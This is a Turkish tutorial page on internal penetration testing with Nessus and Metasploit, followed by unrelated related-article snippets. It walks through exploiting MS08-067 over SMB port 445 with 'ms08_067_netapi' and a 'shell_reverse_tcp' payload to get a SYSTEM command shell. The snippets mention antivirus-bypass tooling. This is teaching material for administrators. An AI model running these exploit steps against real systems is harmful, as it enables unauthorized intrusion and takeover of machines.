Nessus ile şirket içi pentest (Sızma)

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "Nessus ile şirket içi pentest (Sızma)"

Transkript

1 Nessus ile şirket içi pentest (Sızma) Daha önceki makalelerimde hep kişisel bilgi güvenliği üzerine bilgiler vermekteydim. Bu makalemde birçok arkadaşın ısrarla istediği kurumsal yapılarda penetration (Sızma) testinin aşamalarını anlatacağım. Bu makalemiz penetration test aşamalarından biri olan White Box (Beyaz Kutu) ı kapsamaktadır. White Box penetration teste kısaca değinecek olursak; şirket içinde kullanılan tüm cihazlar hakkında bilgi sahibi olunarak yapılan bir sızma testidir. Bu test yöntemi en çok sistem yöneticileri tarafından internal (iç) networkte bulunan cihazların güvenliğini sağlamak üzere yapılmaktadır. Bu makaleyi kaleme almamdaki asıl neden ise; firma yahut kurumlara yapılan saldırıların %60 lık kısmının firma çalışanları tarafından yapıldığından, sistem yöneticileri ve sistem uzmanlarının bu tarz saldırılara karşı güvenlik önlemlerini alarak, şirket içi güvenlik politikalarını da göz önünde bulundurup bilgi güvenliğini azami derecede sağlamalarına yardımcı olmaktır. White Box penetration testi yaparken Nessus tan faydalanacağız. Nessus ile networkte bulunan cihazların güvenlik zafiyetlerini test ettikten sonra, MetaSploit Framework ile bulduğumuz güvenlik açıklarını exploit ederek sisteme sızma işleminin nasıl gerçekleştirildiğini makalenin devamında bulabileceksiniz. Tüm bu işlemlerde Nessus otomatikleştirilmiş güvenlik zafiyet denetleyicisi bize yol gösterecektir. Bu makalenin ön gereklilikleri: 1-) Nessus kullanımını bilmek. Bilmeyenlerin adresinde bulunan Nessus Security Scanner ve Kullanımı başlıklı makaleyi okumaları gerekmektedir. 2-) Metasploit ile Sızma işleminin nasıl gerçekleştirilebileceği ile ilgili temel bilgi sahibi olmak. MetaSploit ile sızma konusunda bilgisi olmayanların adresinde bulunan MetaSploit ile Windows XP SP3 Sızma (Hacking) başlıklı makaleyi okumaları gerekmektedir. 3-) Nessus Security Scanner Windows için olan sürümünü bu adresten indirebilirsiniz. 4-) MetaSploit Framework Windows için olan sürümünü bu adresten indirebilirsiniz. Yukardaki gerekliliklerden ilk ikisini yerine getirince 3-4 üncü maddedeki programların nasıl kurulacağı ile ilgili bilgileri öğrenmiş olacağız. Her iki programı ilk iki maddede bulunan makalelere göre kurup, sisteminizde penetration test yapma işlemi için gerekli zemini hazırlayın. Nessus u kurduktan sonra mutlaka güncelleme yapınız. Arından bir Explorer (Tarayıcı) açın. Bu tarayıcı Internet Explorer, Mozilla Firefox veya Opera olabilir. Adres satırına https://localhost:8834/ yazarak Nessus güvenlik zafiyet tarayıcısı yönetim konsoluna ulaşarak Nessus u aktif hale getirelim. Nessus kullanıcı adı ve şifrenizi aşağıdaki gibi girip, Log In ile yönetim paneline giriş yapın.

2 Girişimizi yaptıktan sonra Policies kısmından Add i tıklayarak pentest yapmak üzere bir tarama kuralı oluşturuyoruz. Kural oluşturmak için karşımıza yukarıdaki gibi bir ekran gelecektir. Burada öncelikle Name kısmına kural için bir isim belirliyoruz. Eğer Nessus scanner ı bir sunucu üzerine kurup client ile tarama yapacak isek Visibility kısmını Shared olarak seçiyoruz. Aksi durumda Private kalmasında bir sakınca yoktur. Description kısmına; kural ile ilgili bir açıklama yazıyoruz. Benim white box pentest yapmak üzere hazırlamış olduğum kural dosyanı EYUP_CELIK.

3 nessus adresine sağ tıklayıp Farklı Kaydet ten bilgisayarınıza kaydedin. Ardından Policies kısmından Import u tıklayın. Browse dan indirmiş olduğunuz Nessus kural dosyasını seçip Submit i tıklayın. Kuralları yükledikten sonra Policies ana ekranına geri döneceksiniz. Buradan Scans i tıklayın. Yukarıdaki resimde göreceğiniz üzere Name kısmından yapacağımız taramaya bir isim vermiş olduk. Type kısmından Run Now (Şimdi Çalıştır) ı seçtik. Policy kısmında yüklemiş olduğumuz tarama kuralını seçiyoruz. En önemli kısım olan Scan Target kısmında tarama yapacağımız network aralığını yazdık. Ben networkünde 24 bitlik maskeleme ile tarama yaptırdım. Bu şu demek; ip adresinden ip adresine kadar olan tüm bilgisayarları tara. Daha büyük networklerde otomatikleştirilmiş bir tarama yapacak isek /16 yazarak, 16 bitlik maskeleme ile tarama yaptırabiliriz. 16 bitlik maskeleme ip adresinden ip adresine kadar olan tüm bilgisayarları tarayacaktır. 16 bitlik maskeleme biraz uzun sürecek bir tarama tipidir. Scan Target kısmını kendi network ümüze göre ayarladıktan sonra Launch Scan i tıklayarak taramayı başlatıyoruz. Tarama bittikten tarama raporuna Reports kısmından ulaşıyoruz. Name kısmından taramaya vermiş olduğumuz ismini çift tıklayarak detaylı raporu görüntülüyoruz.

4 Tarama raporumuz yukarıdaki gibi görüntülenecektir. Host kısmında güvenlik taraması yapılan bilgisayarın ip adresini göstermekte. Hemen yanında bulunan Total kısmı hedef sistem üzerinde bulmuş olduğu toplam güvenlik açıklarını sayısal olarak vermekte. High kısmı hedef sistem üzerinde bulunan kritik derecede olan güvenlik açıklarını, Medium orta düzeyde olan güvenlik açıklarını, low ise düşük derecede olan güvenlik açıkları sayılarını gösterir. Open port kısmı ise hedef sistem üzerinde bulunan açık portların sayısını gösterir. Bu raporu görüntüledikten sonra, sızma işleminin yapılacağı hedef sistemler, kritik güvenlik açıkları olan sistemler seçilecektir. Hedef sistemdeki kritik güvenlik açıklarının neler olduğuna bakmak üzere High kısmında bulunan güvenlik açığı sayısına tıklayacağız. Yukarıdaki resimde göreceğiniz üzere IP adresi üzerinde 5 tane kritik, 1 tane orta düzey, 24 tane düşük, 12 tane de açık port olmak üzere 42 adet güvenlik zafiyeti varmış. Düşük düzeyde olan güvenlik açıkları genelde hedef sistem hakkında bilgi toplama (footprinting) esnasında hedef sunucunun üzerinde bulunan açık port ve servis bilgilerini göndermesinden kaynaklıdır. Pentest sırasında eğer hedef sistem üzerinde kritik bir güvenlik açığı yok ise, footprinting ile bilgi aldığımız servisleri kullanarak hedef sisteme sızmaya çalışmamız gerekmektedir. Bizim hedef sistemimizde 5 tane kritik güvenlik zafiyeti olduğundan dolayı, biz bu kritik güvenlik zafiyetlerini kullanarak hedef sisteme sızacağız. Bu kritik güvenlik açıklarının neler olduğunu ve nasıl kullanılması gerektiğini öğrenmek için High kısmında bulunan 5 rakamını tıklıyoruz ve aşağıdaki gibi bir ekran elde etmiş oluyoruz. Nessus penetration test yapmış olduğu sistem üzerinde bulunan 5 adet kritik güvenlik açığını yukarıdaki gibi bize raporlamış oldu. Bu rapor bize hedef sisteme nasıl sızmamız gerektiğini açık bir şekilde söylemekte. Rapora detaylıca bakacak olursak eğer; MS09-001, Windows

5 SMB Shares, MS10-012, MS10-054, MS gibi 5 başlık altında hedef sistemin kritik güvenlik açıklarını öğrenmiş olduk. Şimdi Nessus un bulduğu ilk güvenlik açığını bize hedef sistemde neler yapabileceğimizi az çok anlatmakta. Hedef sistem üzerinde MS Microsoft Windows SMB Güvenlik açığı ile uzaktan kod çalıştırma zafiyeti bulunduğunu bilgisini almış oluyoruz. Güvenlik zafiyeti ile ilgili daha fazla bilgi almak için MS Microsoft Windows SMB yazısını tıklayarak güvenlik zafiyeti ile ilgili tüm ayrıntıları görüntüleyebiliriz. Biz en altta bulunan MS kritik güvenlik zafiyetini kullanarak hedefe sızmaya çalışacağız. Yukarıdaki resimde gördüğümüz gibi Nessus un Plugin i ile MS güvenlik zafiyetini kullanarak hedef üzerinde uzaktan kod çalıştırılabilmekte. Güvenlik açığının detaylarını öğrenmek için Plugin ID sini veya açık adını (Name) tıklayarak, teknik bilgilere erişiyoruz. Yukarıdaki resimde göreceğimiz üzere, hedef sistemde bulunan güvenlik açığının teknik detayları yer almaktadır. Bu resimden hareketle, hedef sisteme sızmak için 445 nolu portun kullanılacağı, risk faktörünün kritik düzeyde olduğunu öğreniyoruz. Teknik detaylar kısmının en altında yer alan bilgiler ise bizim hedefe sızabilmemizi sağlayan kritik bilgilerdir. Raporun alt kısmında yer alan Public Exploit Available kısmı eğer True ise güvenlik zafiyetini kullanabilen bir exploit herkesin kullanımına açılmış demektir. Bu cümlenin yanisi şu; Hedef sistemde bulunan güvenlik açığını kullanarak hedef sisteme sızmak için yazılmış bir exploit yayınlanmıştır. Bu exploit uluslar arası Black Hat exploit paylaşım platformu olan, Exploitdb, PacketStormSecurity gibi siteler üzerinden yayınlanmaktadır. Teknik detay kısmının en altında yer alan Exploitable With kısmı, hedef sistem üzerinde bulunan güvenlik açığını hangi program ile exploit edilebileceğini yazmaktadır. Buna göre hedef sistem üzerinde bulunan güvenlik zafiyetini Canvas (Immunity Canvas), Core Impact (Core Security) ve MetaSploit (Rapid7 Project) programlarından birini kullanarak hedef sisteme sızılabilirmiş. MetaSploit in ücretsiz oluşu ve exploit-db ile authenticate olması sektörde tercih sebepleri arasında yer almaktadır. Ancak Core Impact ten kısaca bahsedecek olursak, Core Impact Nessus gibi hedef

6 sistemler üzerinde güvenlik zafiyetlerini test ederek, bulduğu güvenlik zafiyetlerini ayrıca exploit edebilen bir güvenlik programıdır. Bu açıdan Core Impact sektördeki en tehlikeli güvenlik tarayıcılarından biridir. Programın lisanslı oluşu ve warez sitelerinde bulunmayışından dolayı program herkes tarafından kullanılamamaktadır. Şimdi sıra bulduğumuz bu güvenlik zafiyetlerini exploit etmeye geldi. Bunun için en büyük yardımcımız olan MetaSploit Framework ün Console sürümünü çalıştırıyoruz. Neden console kullandığımı soracak olursanız eğer, console tüm MetaSploit Framework özelliklerini kendi altında barındıp, en hızlı şekilde çalıştığından dolayı, her zaman ilk tercihim console modundan yana olmuştur. MetaSploit i çalıştırır çalıştırmaz mutlaka update ederek yeni zafiyetlerin MetaSploit veritabanına kaydedilmesini sağlamalıyız. MetaSploit güncelleme işlemini bitirdikten sonra, Nessus ile bulduğumuz kritik güvenlik açıklarını exploit etmek üzere MetaSploit veritabanında arattırıyoruz. Bunun için MetaSploit console ekranına search MS08 yazıp, hedef sistem üzerinde çalıştırabileceğimiz uygun exploiti arıyoruz. Resimden anlaşılacağı üzere search MS08 yazarak exploit veritabanından MS exploitini bulmaya çalıştık. Komut bize MS08 i içeren 7 adet exploit olduğunu bilgisini döndürdü. Nessus bulduğu güvenlik zafiyetinde güvenlik açığının adının MS Microsoft Windows SMB olarak nitelendirmişti. Dolayısı ile bizimde kullanabileceğimiz exploit in ms08-067_netapi olduğunu aynı isimde başka exploit olmamasından anlıyoruz. Exploiti kullanmak için MetaSploit console ekranına use windows/smb/ms08_067_netapi yazıyoruz.

7 Exploitin ayarlanması gereken özelliklerine bakmak için show komutunu kullanıyoruz. MetaSploit console ekranına show options komutu ile exploit üzerinde yapmamız gereken değişiklikleri giriyoruz. Show options komut çıktısı yukarıdaki gibi olacaktır. Rhost karşısında bulunan Required kısmı yes olduğundan dolayı bu bölümü mutlaka doldurmalıyız. Bu işlem için ise set komutunu kullanacağız.

8 Set RHOST komutu ile exploitin IP adresine sahip bilgisayar üzerinden exploit edileceğini belirttik. Ardından herhangi bir hataya meydan vermemek için show options komutunu kullanarak RHOST kısmına belirttiğimiz IP adresinin eklenip eklenmediğini kontrol ediyoruz. Tüm bu işlemlerden sonra exploitimiz hedef sistem üzerinde çalışmaya hazır bir şekildedir. Exploit komutu ile derleyip çalıştırarak hedef sistemi meterpreter yardımcı aracı ile ele geçirebiliriz. Fakat ben bunu istemiyorum. Meterpreter bir çok aracı içerisinde bulunduran çok geniş bir payload olabilir ancak ben Windows komut sistemini ele geçirerek sızma işlemini göstermek istiyorum. Dolayısı ile meterpreter ı anlatmayacağım. Exploit hedef üzerinde çalıştıksan sonra Windows komut ekranını bize getirmesi için mutlaka payload lardan faydalanmamız gerekmektedir. MetaSploit Framework te payload kullanım işlemi set payload komutu ile gerçekleştirilir.

9 Set payload windows/shell_reverse_tcp komutu ile hedef sistemin komut sistemini ele geçirmek için payload ımızı atadık. Ardından herhangi bir hataya mahal vermemek için show options komutunu kullanarak girmemiz gereken bilgilere bir kez daha göz attık. Shell_reverse_tcp payload ı bizden bir LHOST (Local IP Adresi) bilgisi istemekte olduğunu görüyoruz. Bu LHOST bizim kendi IP adresimiz olacaktır. Buna neden ihtiyaç var diye sorabilirsiniz. Shell_reverse_tcp payload ı hedef sistem exploit edildikten sonra çalışarak, ters bağlantı kurup bizim hedef bilgisayara erişip komut sistemini ele geçirmemiz yerine, hedef sistemin var olan komut sistemini bize getirir. Tersine mühendislik diye nitelendirilen olayın fiziksel olarak uygulamış oluyoruz. Hedef exploit edildiğinde 4444 numaralı portumuza hedef sistemin komut ekranı gelecektir. Bu adımda 4444 nolu port bilgisayarınızda kullanımda ise set LPORT portnumaranız (Set LHOST 3444 gibi) şeklinde portu değiştirebilirsiniz. Netcat gibi bir program kurarak da portlarınızı dinleyerek portlarınıza gelen tüm istekleri kabul edebilirsiniz. Bu adımdan sonra set LHOST komutu ile payload a IP adresimizi giriyoruz. Set LHOST komutu ile payload a kendi IP adresimizi belirttik. Show options komutu ile son kez exploitimize göz atarak kontrol ettikten sonra geriye sadece exploitimizi derleyip hedef sisteme sızma işlemimiz kaldı. Bunun için ise exploit komutundan yararlanacağız.

10 Exploit komutu ile hazırladığımız exploiti derleyerek hedef sistem üzerinde çalıştırdık. Exploit çalıştığında ilk olarak 4444 nolu portumuzu açarak hedeften gelecek tüm isteklere izin verdi. Ardından hedef sistemi fingerprinting (Parmak izi) yöntemi ile hedef sistemin işletim sistemini ve işletim sisteminin sürümünü algıladı. Sonra exploitin target kısmına almış olduğu fingerprint bilgisini ekleyerek exploiti hedef makine üzerinde çalıştırdı. Ve vermiş olduğumuz onca emek boşa gitmedi. Hedef sisteme sızarak komut ekranını ele geçirdik. Şimdi yazacağımız tüm komutlar System yetkileri ile hedef üzerinde çalışacaktır. Yani en ileri yetkilerle hedefe sızmış olduk. Bir ipconfig ile hedef sistemi IP konfigürasyonunu çekelim. Ben payload olarak shell_reverse_tcp payloadı kullandım. Ancak siz hedef sistemin ekranınıda ele geçirebilecek ileri düzey payload lardan olan VncInject payload ını kullanarak hedef sistemi uzak masa üstü gibi ele geçirebilirsiniz. Konu ile ilgili olarak çektiğim videoyu aşağıdan seyredebilirsiniz.

11 Güvenli günler Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) Merhaba arkadaşlar. Samurai Framework ile Temel Hacking makale serisinin ikinci kısmını bu ve devamında ki makalelerimizde inceleyeceğiz. Bu makalemizde temel

Detaylı

Armitage Nedir? Kullanım Öncesi

Armitage Nedir? Kullanım Öncesi Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre

Detaylı

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

Yerel Ağlarda Port 139 ve Saldırı Yöntemi Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu

Detaylı

Google Chrome Kullanıyorsanız; Microsoft Internet Explorer Kullanıyorsanız;

Google Chrome Kullanıyorsanız; Microsoft Internet Explorer Kullanıyorsanız; Öncelikle şöyle kısaca değinelim Proxy (Vekil sunucu) Nedir? Zaman zaman yetkili sunucu veya proxy olarak da anılan Vekil sunucu, internete erişim sırasında kullanılan bir ara sunucudur. Bu durumda, örneğin

Detaylı

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat Merhaba arkadaşlar, Bu yazımızda yerel ağda veya Ip adresimizle bir web sitesinin paylaşıma açılması, aynı ağdan veya uzaktan bir bilgisayarın web sitemize nasıl erişebileceği konuları üzerinde duracağız.

Detaylı

Anti-Virüs Atlatma 3. Kurulum

Anti-Virüs Atlatma 3. Kurulum Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.

Detaylı

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir.

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir. Eş zamanlı Scream! kullanımı Scream!, sismik ağın güçlü bir parçası olacak şekilde tasarlanmıştır. Varsayılan yapılandırma dosyası scream.ini dir ve ilk kullanım sırasında kendini otomatik olarak oluşturur.

Detaylı

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com.

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com. ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com.tr Eyüp ÇELİK Kimdir? Bilgi Güvenliği Uzmanı White Hat Hacker Ethical Hacking

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.

Detaylı

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız. VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.

Detaylı

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız. Kurulum WEB UI Değerli Müşterimiz, Cihazınızın İnternet ayarlarını yapabilmek için lütfen aşağıdaki adımları takip ediniz. Öncelikle modem ve bilgisayarınız arasına lütfen bir Eternet (LAN) kablosu takınız.

Detaylı

vsphere Client(viClient) ile ESXI Kontrolü

vsphere Client(viClient) ile ESXI Kontrolü vsphere Client(viClient) ile ESXI Kontrolü - ESXI ye Tarayıcıdan Bağlanmak - ESXI ye vsphere Client ile Bağlanmak - ESXI Üzerinde Bir Virtual Machine(Sanal Makine) Oluşturmak ESXI ye Tarayıcıdan Bağlanmak

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. USB Disk Paylaşımı Değerli Müşterimiz, AirTies desteklediği USB Tak&Paylaş özelliği ile hiçbir ekstra donanıma ihtiyaç duymadan yaygın olarak kullanılan standart USB disk sürücülerinizi tüm ağınıza paylaştırmanıza

Detaylı

Module 5 Implementing Printing ( Printer Uygulamaları )

Module 5 Implementing Printing ( Printer Uygulamaları ) 36 Module 5 Implementing Printing ( Printer Uygulamaları ) Yazıcı Yükleme Yazıcılarımızı kullanabilmemiz ve diğer kullanıcılara sunabilmemiz için driver lerini yüklememiz gerekmektedir.yazıcı yükleme ve

Detaylı

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir? JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 1.1- JasperReports Server ve Ireport Nedir? 1.2- JasperReports Server ve Ireport Kurulumu 1.3- JasperReports Server Genel

Detaylı

CYGWIN KURULUMU ve KULLANIMI

CYGWIN KURULUMU ve KULLANIMI CYGWIN KURULUMU ve KULLANIMI Cygwin, Microsoft Windows işletim sistemi üzerinde çalışan, open source, bir UNIX simülatörüdür. Cygwin`in asıl amacı *nix türevi sistemlerde yer alan yazılımların Windows

Detaylı

Virtualization. VMware vcenter Server Yapılandırılması

Virtualization. VMware vcenter Server Yapılandırılması Virtualization VMware vcenter Server Yapılandırılması VMware vcenter Server sanallaştırılmış datacenter, kurumsal sunucular gibi yapıların yönetilmesini sağlayan ve maliyetleri aşağılara çeken bir yönetim

Detaylı

Nevşehir Hacı Bektaş Veli Üniversitesi. Moodle Uzaktan Eğitim Sistemi. Öğretim Elemanı Bilgilendirme Kılavuzu

Nevşehir Hacı Bektaş Veli Üniversitesi. Moodle Uzaktan Eğitim Sistemi. Öğretim Elemanı Bilgilendirme Kılavuzu Nevşehir Hacı Bektaş Veli Üniversitesi Moodle Uzaktan Eğitim Sistemi Öğretim Elemanı Bilgilendirme Kılavuzu 1. Moodle Uzaktan Eğitim Sistemine nasıl giriş yapılır? 2. Derse giriş yapma ve yeni bir sanal

Detaylı

BEUN VPN Hizmeti. VPN Nedir?

BEUN VPN Hizmeti. VPN Nedir? BEUN VPN Hizmeti VPN Nedir? VPN, Virtual Private Network, yani Sanal Özel Ağ ın kısaltılmasıdır. VPN, İnternet gibi halka açık telekomünikasyon altyapılarını kullanarak kullanıcılar veya uzak ofisleri

Detaylı

Cihazınızın İnternet ayarlarını yapabilmek için lütfen aşağıdaki adımları takip ediniz;

Cihazınızın İnternet ayarlarını yapabilmek için lütfen aşağıdaki adımları takip ediniz; Kurulum WEB UI Değerli Müşterimiz, Cihazınızın İnternet ayarlarını yapabilmek için lütfen aşağıdaki adımları takip ediniz; Öncelikle modem ve bilgisayarınız arasına lütfen bir Ethernet (LAN) kablosu takınız.

Detaylı

TÜRKİYE KAMU HASTANELERİ KURUMU WEB SİTESİ YÖNETİM REHBERİ

TÜRKİYE KAMU HASTANELERİ KURUMU WEB SİTESİ YÖNETİM REHBERİ TÜRKİYE KAMU HASTANELERİ KURUMU WEB SİTESİ YÖNETİM REHBERİ Bilindiği üzere Kurumumuzun Web Sitesi www.tkhk.gov.tr adresinden yayın yapmaktadır. Web Sitemiz; Alt Alan, Orta Alan, Manşet Haberleri ve Duyurular

Detaylı

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ SİSTEM HACKİNG: Windows Sistem Güvenlik Denetimi: Security Account Manager:Güvenlik Hesabı Yöneticisi windows'da yer alan sunucularda

Detaylı

Sistem ve Ağ İzleme, Test Etme Araçları

Sistem ve Ağ İzleme, Test Etme Araçları Sistem ve Ağ İzleme, Test Etme Araçları Erkan Esmer Kasım, 2012 İçindekiler 1 Giriş.................................................... 2 2 Nessus.................................................. 3 3

Detaylı

WebSiteDefender ile Web Uygulama Güvenliği

WebSiteDefender ile Web Uygulama Güvenliği WebSiteDefender ile Web Uygulama Güvenliği Merhabalar. Bu makalemizde, Acunetix firması tarafından web uygulama güvenliği ve kötü amaçlı yazılımlardan korunmak için hazırlanmış olan Web Site Defender ı

Detaylı

VMware Üzerine BackTrack 5 Kurulumu

VMware Üzerine BackTrack 5 Kurulumu VMware Üzerine BackTrack 5 Kurulumu BackTrack geliştiricileri yeni sürümünde BackTrack kullanımını kolaylaştırmak için birkaç seçenek ile karşımıza çıktılar. BackTrack kullanım seçeneklerinden en etkilisi

Detaylı

Web Application Penetration Test Report

Web Application Penetration Test Report Web Application Penetration Test Report Sızma testleri (Pentest) ve zayıflık tarama (Vulnerability Assessment) birbirine benzeyen iki aşamadan oluşur. Zayıflık tarama hedef sistemdeki güvenlik açıklıklarının

Detaylı

BİL BİLGİSAYAR PROGRAMLAMA (JAVA)

BİL BİLGİSAYAR PROGRAMLAMA (JAVA) BİL 141 - BİLGİSAYAR PROGRAMLAMA (JAVA) KURULUM DÖKÜMANI Ders kapsamında lab saatlerinde veya lab saatleri dışında Java kodları yazabilmek ve çalıştırabilmek için bilgisayarınıza bazı yazılımların kurulması

Detaylı

Program Kurulum. Turquaz Muhasebe. İçindekiler

Program Kurulum. Turquaz Muhasebe. İçindekiler Program Kurulum Turquaz Muhasebe İçindekiler İÇİNDEKİLER 1 1. TEK KULLANICI 2 2. AĞ KURULUMU 4 2.1 VERİTABANI SERVER KURULUMU 4 2.2 VERİTABANI SERVER AYARLARI 11 2.3 DATALARIN YÜKLENMESİ 11 2.4 İSTEMCİ

Detaylı

NEUTRON DDNS KURULUMU

NEUTRON DDNS KURULUMU 1. Üyelik Oluşturma www.quickddns.com Web Adresine Giriş Sağlıyoruz. NEUTRON DDNS KURULUMU Yukarıda Resimde Gördüğünüz (Not Register?) Bağlantısına Tıklıyoruz. Yukarıdaki Gördüğünüz Sayfa Açıldığında (*)

Detaylı

WAMP SERVER KURULUMU

WAMP SERVER KURULUMU WAMP SERVER KURULUMU Bilgisayarınızda; PHP web programlama dilini kullanarak web sayfası hazırlayacaksanız ya da PHP web programlama dili kullanılarak hazırlanmış Joomla, Wordpress, Drupal vb.. içerik

Detaylı

Windows Hacking - II

Windows Hacking - II BGM 554 - Sızma Testleri ve Güvenlik Denetlemeleri-II Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016/2017 - Bahar

Detaylı

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ E-İMZA KURULUM AŞAMALARI Birimimizden almış olduğunuz e-imzanızı

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. Manual MESH Ayarları Değerli Müşterimiz, Kapsama alanını arttırmak için cihazınız ile tekrarlayıcı modunda çalışan bir ya da daha fazla AirTies Kablosuz Erişim Noktası (Access Point) cihazından oluşan

Detaylı

Uygulama web, ios ve Android platformlarında sorunsuz bir şekilde çalışmaktadır.

Uygulama web, ios ve Android platformlarında sorunsuz bir şekilde çalışmaktadır. KahootileQuizOluşturma Uygulamaweb,iOSveAndroidplatformlarındasorunsuzbirşekildeçalışmaktadır. Kahoot öğrencilerinize basit bir şekilde quizler, anketlerhazırlayabileceğinizöğretmenleriçintasarlanmış bir

Detaylı

U y g u l a m a A i l e s i (Abakus 360, T-Panel, T-CRM) Tarayıcı Ayarları. IPera İletişim Teknolojileri

U y g u l a m a A i l e s i (Abakus 360, T-Panel, T-CRM) Tarayıcı Ayarları. IPera İletişim Teknolojileri U y g u l a m a A i l e s i (Abakus 360, T-Panel, T-CRM) Tarayıcı Ayarları Başlarken İletişim yönetimi için gerekli tüm araçları sunan OfisTelefonu 07 programları Abakus 360, T-Panel ve T-CRM, bir kuruluştaki

Detaylı

Bİ L 131 Hafta 2. 1) Bilgisayara Java SE Development Kit 7 kurulması

Bİ L 131 Hafta 2. 1) Bilgisayara Java SE Development Kit 7 kurulması Bİ L 131 Hafta 2 1) Bilgisayara Java SE Development Kit 7 kurulması Bunun için internet tarayıcınızı (örneğin Mozilla Firefox, Google Chrome veya Internet Explorer) açınız ve http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

Detaylı

YAYGIN OLARAK KULLANILAN ADSL MODEMLER VE ROUTER AYARLARI

YAYGIN OLARAK KULLANILAN ADSL MODEMLER VE ROUTER AYARLARI YAYGIN OLARAK KULLANILAN ADSL MODEMLER VE ROUTER AYARLARI D-Link 500G Router Ayarları web arayüzüne ulaşmak için modemin standart IP adresi olan 10.1.1.1 yazıyoruz. o Modeminizin IP adresini web tarayıcınızın

Detaylı

XSS Exploitation via CHEF

XSS Exploitation via CHEF XSS Exploitation via CHEF Evren Yalçın SignalSec Corp. www.signalsec.com GİRİŞ Xss zafiyetlerini exploit ederken genelde Beef(The Browser Exploitation Framework) aracı kullanılmaktadır. Fakat ek araçlar

Detaylı

VKV Koç Özel İlkokulu, Ortaokulu ve Lisesi. K12Net Veli Yardım Kılavuzu

